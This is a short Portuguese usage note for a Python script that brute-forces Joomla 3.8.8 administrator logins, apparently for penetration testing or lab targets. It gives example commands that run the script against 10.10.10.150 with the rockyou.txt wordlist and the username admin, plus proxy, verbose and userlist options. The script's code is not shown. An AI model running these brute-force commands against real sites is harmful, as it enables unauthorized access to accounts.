
Script Python que faz brute-force de credenciais de login de administrador do Joomla usando wordlists, com opções de proxy e modo verboso para testes de penetração.
Bruteforce de login do Joomla
Testado no Joomla! 3.8.8
Uso:
python3 joomla-brute.py -u http://10.10.10.150 -w /usr/share/wordlist/rockyou.txt -usr admin
chmod +x joomla-brute.py
./joomla-brute.py -u http://10.10.10.150 -w /usr/share/wordlist/rockyou.txt -usr admin
Parâmetros opcionais:
-p ou --proxy http://127.0.0.1:8080
-v ou --verbose
-U ou --userlist /usr/share/wordlists/SecLists/Usernames/Names/names.txt